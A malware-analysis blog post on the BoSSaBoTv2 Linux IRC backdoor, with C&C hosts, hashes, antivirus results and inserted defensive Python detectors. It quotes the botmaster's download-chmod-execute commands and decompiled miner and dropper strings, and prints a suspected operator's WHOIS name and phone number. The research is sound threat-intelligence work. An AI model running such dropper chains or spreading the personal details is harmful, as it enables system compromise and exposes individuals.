[en] BoSSaBoTv2: another Linux IRC backdoor

Today, while looking at my web honeypot, this one caught my attention: http://www.malekal.com/modsec/index.php?ip=178.32.59.202
This PHP vulnerability is heavily used (I already wrote something about it: http://www.malekal.com/2014/03/31/backdoor-perl-shellbot-b-et-backdoor-linux-tsunami-a/ ), but it was the first time I saw this kind of base64-encoded code.

The code leads to haxmeup.uni.me (192.95.12.34 – OVH), which redirects to http://www.bilder-upload.eu/thumb/41130a-1408995611.jpg
I expected to get a PHP shellbot as usual, but this time it was a FUD (fully undetected) binary: https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis/1409041374/

So I launched it:

[screenshot: BoSSaBoTv2_modsec]
[screenshot: BoSSaBoTv2_ircbackdoor]

It made a connection to 37.59.74.161 (OVH again) on port 8067; there is an ircd behind it:

nmap -sV 37.59.74.161 -p 8067

Starting Nmap 6.00 ( http://nmap.org ) at 2014-08-26 10:47 CEST
Nmap scan report for 37.59.74.161
Host is up (0.027s latency).
PORT STATE SERVICE VERSION
8067/tcp open irc Unreal ircd
Service Info: Host: irc.wix.wix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds

So, an IRC backdoor.

[screenshot: BoSSaBoTv2_ircbackdoor2]
Another surprise: the ircd does not have any mode set to hide users, etc.
~40 bots, not that many.
So let’s play.
[screenshot: BoSSaBoTv2_ircbackdoor3]

On the screenshot below, we can see that the botmaster launches an IP range scan, then some bots exploit some servers.
We can see that the exploit against 200.185.236.85 was successful because it joins the channel as a new bot.
[screenshot: BoSSaBoTv2_ircbackdoor4] Confirmed by my VM.
We got another DNS name, con32.cz.cc, which resolves to the same IP 192.95.12.34.
[screenshot: BoSSaBoTv2_ircbackdoor5]

Two new bots:

[screenshot: BoSSaBoTv2_ircbackdoor6]

The IRCd is new: around ~40 bots in 9 days:

[screenshot: BoSSaBoTv2_ircbackdoor_ircd]

The botmaster regularly makes the bots download a new binary, all from www.bilder-upload.eu (which seems to be a legitimate image host):

!BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp
!BOSS* SH mv /tmp/05fbc4-1409059856.jpg  /tmp/4L2nJG5Vab
!BOSS* SH chmod 777 /tmp/4L2nJG5Vab
!BOSS* SH /tmp/4L2nJG5Vab
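The four commands above are the whole dropper chain: fetch a file with an image extension into /tmp, rename it, make it executable, run it. As an added example (my code, not the post's and not the bot's), here is a small tracer that follows that chain across a sequence of logged bot commands and reports the files that end up executed. The sample input is constructed from the four lines quoted above plus two harmless commands; the function and class names are mine.

```python
import re
from dataclasses import dataclass, field

# Constructed input for the example: the four botmaster commands quoted above,
# plus two harmless commands added here so the tracer has something to ignore.
SAMPLE_COMMANDS = """\
!BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp
!BOSS* SH mv /tmp/05fbc4-1409059856.jpg  /tmp/4L2nJG5Vab
!BOSS* SH chmod 777 /tmp/4L2nJG5Vab
!BOSS* SH /tmp/4L2nJG5Vab
!BOSS* SH uptime
!BOSS* SH ls -la /tmp
"""

BOT_SH_RE = re.compile(r"^!BOSS\*\s+SH\s+(.+)$")        # "!BOSS* SH <shell command>"
IMAGE_EXT_RE = re.compile(r"\.(jpe?g|png|gif)$", re.I)  # payload disguised as an image
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class Finding:
    path: str                                   # current location of the dropped file
    stages: list = field(default_factory=list)  # what happened to it, in order


def parse_bot_line(line):
    """Return the shell command carried by a '!BOSS* SH ...' line, or None."""
    m = BOT_SH_RE.match(line.strip())
    return m.group(1).strip() if m else None


def trace_dropper(lines):
    """Follow download -> rename -> chmod -> execute across a sequence of bot
    commands and return the files that were actually executed."""
    findings = {}  # path -> Finding
    for raw in lines:
        cmd = parse_bot_line(raw)
        if not cmd:
            continue
        argv = cmd.split()
        if argv[0] in ("wget", "curl"):
            url = next((a for a in argv[1:] if a.startswith(("http://", "https://"))), None)
            if url is None:
                continue
            # wget -P <dir> stores the file under <dir> with the URL's basename
            dest_dir = argv[argv.index("-P") + 1] if "-P" in argv[:-1] else "."
            path = dest_dir.rstrip("/") + "/" + url.rsplit("/", 1)[-1]
            f = Finding(path=path, stages=["download"])
            if IMAGE_EXT_RE.search(path):
                f.stages.append("image-extension")
            if path.startswith(TEMP_DIRS):
                f.stages.append("temp-dir")
            findings[path] = f
        elif argv[0] == "mv" and len(argv) >= 3 and argv[1] in findings:
            f = findings.pop(argv[1])       # keep tracking the file under its new name
            f.path = argv[2]
            f.stages.append("rename")
            findings[argv[2]] = f
        elif argv[0] == "chmod" and len(argv) >= 3 and argv[2] in findings:
            findings[argv[2]].stages.append("chmod:" + argv[1])
        elif argv[0] in findings:
            findings[argv[0]].stages.append("execute")
    return [f for f in findings.values() if "execute" in f.stages]


if __name__ == "__main__":
    for f in trace_dropper(SAMPLE_COMMANDS.splitlines()):
        print(f.path, "->", " > ".join(f.stages))
```

The same chain shows up in auditd or shell-history data on a compromised host; only the line parser needs to change, the state machine over download/rename/chmod/execute stays the same.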

Recap of some hashes and hosts:
haxmeup.uni.me / con32.cz.cc / con64.cz.cc (192.95.12.34 – OVH)
haxmedown.cz.cc 37.59.74.161

http://malwaredb.malekal.com/index.php?hash=35c950db3dc60b55e623ec591f8d7f33
http://malwaredb.malekal.com/index.php?hash=7f8cc390f7b3e53f2921f0debae09902
http://malwaredb.malekal.com/index.php?hash=dfb0291c04d6593103e6ac7a8954f19e
http://malwaredb.malekal.com/index.php?hash=b36de738b5a807529f343f25a8ace0e0
http://malwaredb.malekal.com/index.php?hash=e9bb00d0faea2529cd5cc64147affdc4

[screenshot: BoSSaBoTv2_md5]

Then I wrote a little script to send the abuse emails; hopefully they will lose some bots 🙂

[screenshot: BoSSaBoTv2_abuse]

MalwareMustDie decompiled the binary; some strings: http://pjjoint.malekal.com/files.php?read=20140826_n7h14d5w5i6
Thanks to them.

Bitcoin mining capabilities:

000000007BC0   /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
000000007C20   pkill minerd ; pkill m32 ; pkill m64
000000007C60   wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
000000007CC0   tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp
000000007D00   NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s 
000000007D40   pkill %s ; pkill %s ; rm -r /tmp/%s ; rm -r /tmp/%s ; wget %s -P - -O /tmp/%s ; wget %s -P - -O /tmp/%s ; chmod 777 /tmp/%s ; chmod 777 /tmp/%s ; /tmp/%s ; /tmp/%s

The most interesting one:

000000007E1D   BoSSaBoTv2-%s
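The strings above are what an analyst keys on: the miner command line, the kill of competing miners, the IRC NOTICE format and the family name. As an added example, not from the post or from MalwareMustDie's work, here is a small string scanner that pulls printable strings out of a constructed byte blob standing in for the binary and classifies them against those indicators. The blob, the category names and the function names are mine; the indicator strings are the ones quoted above.

```python
import re

# Constructed stand-in for the binary: filler bytes wrapped around the strings
# quoted above. This is NOT the real sample; it exists so the example runs offline.
FAKE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"/tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &\x00"
    + b"\x90\x90\x48\x89\xe5\x00"
    + b"pkill minerd ; pkill m32 ; pkill m64\x00"
    + b"\x01\x02ab\x00"
    + b"NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s \x00"
    + b"BoSSaBoTv2-%s\x00"
    + b"\xff\xfe/bin/sh\x00"
)

# Indicators from the strings dump, grouped by what they tell an analyst.
INDICATORS = {
    "cpu-miner": [rb"stratum\+tcp://", rb"/tmp/minerd", rb"pooler-cpuminer"],
    "kill-competing-miners": [rb"pkill minerd"],
    "irc-notice": [rb"^NOTICE %s :"],
    "bossabot-family": [rb"BoSSaBoTv2-"],
}
COMPILED = {cat: [re.compile(p) for p in pats] for cat, pats in INDICATORS.items()}


def extract_strings(blob, min_len=4):
    """Like the `strings` tool: runs of printable ASCII at least min_len long."""
    return [m.group(0) for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def classify(blob):
    """Map each indicator category to the strings in blob that matched it."""
    hits = {cat: [] for cat in COMPILED}
    for s in extract_strings(blob):
        for cat, pats in COMPILED.items():
            if any(p.search(s) for p in pats):
                hits[cat].append(s.decode("ascii"))
    return hits


def verdict(blob):
    """Return (label, matched_categories). The family string outranks the
    generic miner indicators, which unrelated droppers also carry."""
    matched = [cat for cat, strings in classify(blob).items() if strings]
    if "bossabot-family" in matched:
        return "BoSSaBoTv2", matched
    if "cpu-miner" in matched:
        return "cpu-miner-dropper", matched
    return "no-match", matched


if __name__ == "__main__":
    label, cats = verdict(FAKE_BINARY)
    print(label, cats)
    for cat, strings in classify(FAKE_BINARY).items():
        for s in strings:
            print(f"  [{cat}] {s}")
```

Run against a real file, `classify(open(path, "rb").read())` gives the same category breakdown; the same indicator list translates directly into a YARA rule if that is the tooling in use.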

A Google search for this string turns up this topic on http://www.hackforums.net/showthread.php?tid=4395309
According to the post date, the kit is new and the price is $100.

[screenshot: BoSSaBoTv2_ircbackdoor_disclosure]

EDIT – September 8

Back; lots of attacks this weekend:

http://www.malekal.com/modsec/index.php?ip=213.73.31.13
http://www.malekal.com/modsec/index.php?ip=195.154.140.251
http://www.malekal.com/modsec/index.php?ip=5.135.64.105
http://www.malekal.com/modsec/index.php?ip=46.105.230.91
http://www.malekal.com/modsec/index.php?ip=128.233.173.167

Binaries are undetected:

http://malwaredb.malekal.com/index.php?hash=5453043042be4ad21259bcb9b17e9bd3
http://malwaredb.malekal.com/index.php?hash=36263d91d726dcdb93b97ea05ae8656a

IRCd : 23.95.10.101 port 53

[screenshot: BossaBot_comeback]

EDIT – September 21 2014 : Two botnets

We found two different botnets involved.
In the previous edit, you can see some screenshots with a channel #w00t.
The IRCd moved to IRC.DREAMBOXDB.COM (23.95.10.101:53/TCP) (binary: http://malwaredb.malekal.com/index.php?hash=b40b2d32fe4eadea78ac469782c3963613c405813b0f994ce0bd7de800d20737).

Sloboz network

The guy behind this botnet seems to be Romanian:

[screenshot: IRCBot_sloboz_download] [screenshot: IRCBot_sloboz_download2]

He makes the bots download a .tgz: http://malwaredb.malekal.com/index.php?hash=61fbbfd71c43a27c96c07a82edab4ee9
The file crond is a binary detected as Spyware.Unix.Mech.A: https://www.virustotal.com/fr/file/68aef1145b4e208cf6600d2ccda0080d8ec7a7fe97354b92a7378b81975fbb63/analysis/

[screenshot: IRCBot_sloboz]

It’s an IRC backdoor; it connects to the channels #linuxmafia and #m@trix on different ircds, including the Undernet network.
We can see the masters are imp / sloboz / demo with an IP in the 23.* range (same range as the BossaBackdoor C&C).

[screenshot: IRCBot_sloboz3]

[screenshot: IRCBot_sloboz2]

So I connected to Undernet, and the guy sloboz was also connected.
He uses the same IP as the BossaBackdoor C&C: 23.95.10.101

[screenshot: IRCBot_sloboz5]

[screenshot: IRCBot_sloboz4]

As you can see, there are some G-lines resulting from virus detection; this is the .tgz IRC backdoor.

[screenshot: IRCBot_sloboz6]

I also found this old topic where someone claims to have had his nickname stolen on the Undernet network: http://www.undernet.org/forum/viewtopic.php?f=4&t=9471&start=0
The victim said that the author is: *** HeyHey is sloboz@86.104.220.177
The address leads to a Romanian IP range.

According to Urban Dictionary: http://www.urbandictionary.com/define.php?term=sloboz
There is also a city in Romania called Slobozia.

It seems he lost all his bots.

Very pleased to see that antivirus vendors have moved on his binary: https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis/

SHA256: bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9
File name: vti-rescan
Detection ratio: 16 / 53
Analysis date: 2014-09-15 09:55:35 UTC (6 days, 3 hours ago)

Antivirus              Result                            Update
Ad-Aware               Backdoor.BossaBot.A               20140915
Avast                  ELF:BossaBot-A [Trj]              20140915
BitDefender            Backdoor.BossaBot.A               20140915
DrWeb                  Linux.BackDoor.Irc.4              20140915
Emsisoft               Backdoor.BossaBot.A (B)           20140915
F-Secure               Backdoor.BossaBot.A               20140915
GData                  Backdoor.BossaBot.A               20140915
Ikarus                 Backdoor.BossaBot                 20140915
Kaspersky              HEUR:Backdoor.Linux.Bassobo.a     20140915
MicroWorld-eScan       Backdoor.BossaBot.A               20140915
Norman                 BossaBot.A                        20140914
Sophos                 Linux/BosaBot-A                   20140915
Symantec               Linux.Backdoor.Kaiten             20140915
Tencent                Win32.Backdoor.Gen.Ugrc           20140915
TrendMicro-HouseCall   ELF_BASSBOT.A                     20140915
nProtect               Backdoor.BossaBot.A               20140914

Snk / sult4n network

The second botnet: 2598 local users; if all of them are bots, that is not bad.
Notice the server name Sult4n. [screenshot: Bossa_sult4n]

Binary: http://malwaredb.malekal.com/index.php?hash=132397a7e793fb4052f8d44634a15582 – C&C: SRV5050.CO; KA3EK.COM; IRCQFRUM.COM (1.34.224.120) & 8RB.SU (144.76.40.132)
All these domains are registered with the email address sullt4n@hotmail.com:

Administrative Contact ID: CR170538145
Administrative Contact Name: Sultan AL-Ghamdi
Administrative Contact Address1: Saudi arabia
Administrative Contact City: RiyadH
Administrative Contact State/Province: RiyadH
Administrative Contact Postal Code: 102345
Administrative Contact Country: Saudi Arabia
Administrative Contact Country Code: SA
Administrative Contact Phone Number: +966.533888508
Administrative Contact Email: sullt4n@hotmail.com

A look at Google gives other old domains registered with the same IPs, used as C&C for Windows IRC backdoors: zerx-virus.biz and x01bkr2.biz

  • April 2009: http://www.threatexpert.com/report.aspx?md5=7b3006772b76a997d4fc93e6c7b30142
  • March 2010: MSN worms: http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Worm%253aWin32%252fPushbot.FB&ThreatID=124698&Search=true#tab=2
  • July 2013: http://www.threatexpert.com/report.aspx?md5=a5e0f5419ce9d9f8e2aa1e241ca0505c

The address SRV5050.CO was well known to me because I wrote about it before, in a write-up on Win32.Phorpiex, a Skype worm (in French): http://www.malekal.com/2013/01/26/backdoor-irc-snk-se-propage-par-skype/
This worm was used to push FakeAV, Urausy ransomware, Crypted ransomware, spambots and other malware.
exposedbotnets.com calls him « Snk »: http://www.exposedbotnets.com/2013/04/x01bkr2biz-snk-asper-mod-irc-botnet.html

This guy has been very active for years!

EDIT – May 5 2015 : Comeback

Around April 15th, a new attack wave to push BossaBot.
Still PHP attacks:

[screenshot: BoSSaBot_April_2015]
and ShellShock attempts with two different URLs:

[screenshot: BoSSaBot_April_2015_attack2] [screenshot: BoSSaBot_April_2015_attack]

IRCd:

[screenshot: BossaBot_ircd]

The domain is suspended: https://twitter.com/malekal_morte/status/595496401041231872

EDIT – September 2015 : still active

Some days ago, I got this ShellShock attempt, but the link was not working.
I recognized the URL used by BossaBot.

[screenshot: ShellShock_BossaBot]

Today, more ShellShock attempts, all from OVH.
Here is the list:

37.59.149.136
91.121.4.163
94.23.248.135
94.23.63.125
188.165.210.224
94.23.20.161
188.165.245.68
188.165.220.171
188.165.253.55
94.23.4.99
188.165.237.170
91.121.199.85
91.121.47.52
91.121.223.149
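As an added example, not part of the original post, here is a parser for combined-format web server log lines that flags the Shellshock signature (a function definition followed by a statement, the shape of every such probe) in the request, referer or user-agent field, and notes whether the source address is one of those listed above. The log lines are constructed for the example and the probe payloads only echo a marker; PAGE_SOURCES, parse_line, find_shellshock and sources are my names.

```python
import re
from collections import Counter

# Source addresses the post lists for the September 2015 wave (all OVH).
PAGE_SOURCES = {
    "37.59.149.136", "91.121.4.163", "94.23.248.135", "94.23.63.125",
    "188.165.210.224", "94.23.20.161", "188.165.245.68", "188.165.220.171",
    "188.165.253.55", "94.23.4.99", "188.165.237.170", "91.121.199.85",
    "91.121.47.52", "91.121.223.149",
}

# Constructed access-log lines: three probes (source IPs from the list above,
# payloads that only echo a marker) and one ordinary request from a TEST-NET address.
SAMPLE_LOG = """\
37.59.149.136 - - [24/Sep/2015:05:31:12 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "-" "() { :;}; echo shellshock-probe"
94.23.248.135 - - [24/Sep/2015:05:32:40 +0200] "GET / HTTP/1.1" 200 612 "() { :; }; echo shellshock-probe" "Mozilla/5.0"
203.0.113.7 - - [24/Sep/2015:05:33:01 +0200] "GET /index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (X11; Linux x86_64)"
188.165.210.224 - - [24/Sep/2015:05:35:55 +0200] "GET /cgi-bin/php HTTP/1.0" 404 209 "-" "() { x;};echo;echo shellshock-probe"
"""

# Apache/nginx "combined" format; the user-agent is the last quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<user_agent>.*)"$'
)
# "() { ... };" : an exported function body followed by a trailing command.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{.*?\}\s*;")


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def find_shellshock(lines):
    """Return one record per line carrying the Shellshock signature in any
    client-controlled field, tagged with whether the source is already known."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("request", "referer", "user_agent"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({
                    "ip": rec["ip"], "ts": rec["ts"], "field": field,
                    "payload": rec[field],
                    "known_source": rec["ip"] in PAGE_SOURCES,
                })
                break   # one record per line is enough
    return hits


def sources(hits):
    """Count probes per source address, for the abuse report."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = find_shellshock(SAMPLE_LOG.splitlines())
    for h in found:
        flag = "known" if h["known_source"] else "NEW"
        print(f"{h['ip']:16} {flag:5} {h['field']:10} {h['payload']}")
    print(sources(found))
```

The same regex applied to the raw request headers (Cookie, Host, any custom header) catches probes that never reach the access log fields; the access log is simply the cheapest place to look first.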

[screenshot: ShellShock_BossaBot_3]

Also some PHP stuff as before:

[screenshot: ShellShock_BossaBot_2]
The binaries are old, 5 months old:

https://www.virustotal.com/fr/file/5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af/analysis/1443073141/
https://www.virustotal.com/fr/file/3a4f90405832615a5dbe59c64e6de50c2a1a3e9b372a8605daf60960d4bef016/analysis/1443073265/
https://www.virustotal.com/fr/file/5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af/analysis/1443073141/

but detections are still average:

SHA256: 5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af
File name: susu2
Detection ratio: 14 / 56
Analysis date: 2015-09-24 05:39:01 UTC (2 minutes ago)

Antivirus          Result                             Update
AVG                Linux/Tsunami                      20150924
AhnLab-V3          Linux/Ssabobot.B                   20150923
Avast              ELF:Tsunami-BH [Cryp]              20150924
CAT-QuickHeal      Linux.Ropys.PR6b5                  20150924
DrWeb              Linux.BackDoor.Sessox.1            20150924
ESET-NOD32         a variant of Linux/Tsunami.NAL     20150924
GData              Linux.Trojan.Agent.750WU5          20150924
Jiangmin           Backdoor/Linux.oo                  20150922
Kaspersky          HEUR:Backdoor.Linux.Ropys.a        20150924
NANO-Antivirus     Trojan.Unix.Ropys.drxdby           20150924
Sophos             Mal/Generic-S                      20150923
Symantec           Linux.Susiribot                    20150923
Tencent            Linux.Backdoor.Ropys.Liha          20150924
Zillya             Trojan.Tsunami.Linux.80            20150923

The IRCd is at 93.189.4.131:53 (Cloud-Servers).
Same IRCd modes as before.

[screenshot: ShellShock_BossaBot_4]

Gonna ping some abuse contacts =)

EDIT – 6 October: still active

Still new binaries; MalwareMustDie also made an interesting tweet with an image link: http://t.co/OgNkLxSQGe

[screenshot: BossaBot_MalwareMustDie]


9 thoughts on “[en] BoSSaBoTv2: another Linux IRC backdoor”

  1. Using botnets of zombie computers to spread malicious code through vulnerabilities in order to perform cyber-based attacks like denial-of-service is a big mistake. Please, report this kind of cybercrime activities to federal law enforcement. Keep up the good work.

  2. GoDaddy, what about your ToS ?
    – IRCQFRUM.COM (62.75.202.19)
    – KA3EK.COM (62.75.202.19)
    – NADNADZZZ.INFO (62.75.202.19)
    – SRV5050.CO (62.75.202.19)
    – SAUDICOOL.ORG (62.75.202.19)
    – X01BKR2.BIZ (62.75.202.19)
    – ZERX-VIRUS.BIZ (62.75.202.19)
    – … Just Glue-it !?

    Hotmail / Live account ? What about Policies, Microsoft ?

    Hosting ( 62.75.202.19 ) Alo, PlusServer ? Many thanks!

    Malekal, this guy has been active for a long time because it’s a Ping Pong party.
    Example : « If you would like to take further action … you should contact the … ( not us ) »

    Good luck, MalwareMustDie.

  3. – SAUDICOOL.ORG (198.136.49.210)

    – KA3EK.COM (62.75.246.5)
    – IRCQFRUM.COM (62.75.246.5)
    – LEBANONBT.INFO (62.75.246.5)
    – NADNADZZZ.INFO (62.75.246.5)
    – SRV5050.CO (62.75.246.5)
    – X01BKR2.BIZ (62.75.246.5)
    – ZERX-VIRUS.BIZ (62.75.246.5)

  4. [ 198.136.49.210 ]
    HOSTDIME.COM, INC.
    2603 CHALLENGER TECH CT
    SUITE 140, ORLANDO – FLORIDA
    UNITED STATES OF AMERICA

    – KA3EK.COM (198.136.49.210)
    – IRCQFRUM.COM (198.136.49.210)
    – LEBANONBT.INFO (198.136.49.210)
    – NADNADZZZ.INFO (198.136.49.210)
    – SAUDICOOL.ORG (198.136.49.210)
    – SRV5050.CO (198.136.49.210)
    – X01BKR2.BIZ (198.136.49.210)
    – ZERX-VIRUS.BIZ (198.136.49.210)

  5. – SAUDICOOL.ORG (188.40.254.145)
    > C&C 188.40.254.145:53/TCP
    > C&C 188.40.254.145:8080/TCP
    # RASHAD SHAHEEN
    # DISA COMPANY (DISA.JO)
    # SWEFIEH ST.
    # AMMAN, JORDAN

    – IRCQFRUM.COM (61.155.106.209)
    – KA3EK.COM (61.155.106.209)
    – X01BKR2.BIZ (61.155.106.209)
    – ZERX-VIRUS.BIZ (61.155.106.209)
    > C&C 61.155.106.209:53/TCP
    > C&C 61.155.106.209:8080/TCP
    # CHINA TELECOM
    # A12, XIN-JIE-KOU-WAI STREET
    # BEIJING 100088, CHINA

  6. – IRCQFRUM.COM (37.49.224.148)
    – KA3EK.COM (37.49.224.148)
    – X01BKR2.BIZ (37.49.224.148)
    – ZERX-VIRUS.BIZ (37.49.224.148)

    > C&C 37.49.224.148:53/TCP
    # ESTRO WEB SERVICES PRIVATE LIMITED
    # H. NO. 1, MANGU PANNA
    # TATESAR WALA RASTA, VILLAGE – JAUNTI
    # DELHI – 110081, INDIA

  7. – KA3EK.COM ( SUSPENDED )
    – IRCQFRUM.COM ( SUSPENDED )
    – LEBANONBT.INFO (37.49.224.148)
    – NADNADZZZ.INFO (188.40.254.145)
    – SAUDICOOL.ORG (198.136.49.210)
    – SRV5050.CO ( SUSPENDED )
    – X01BKR2.BIZ ( SUSPENDED )
    – ZERX-VIRUS.BIZ ( SUSPENDED )
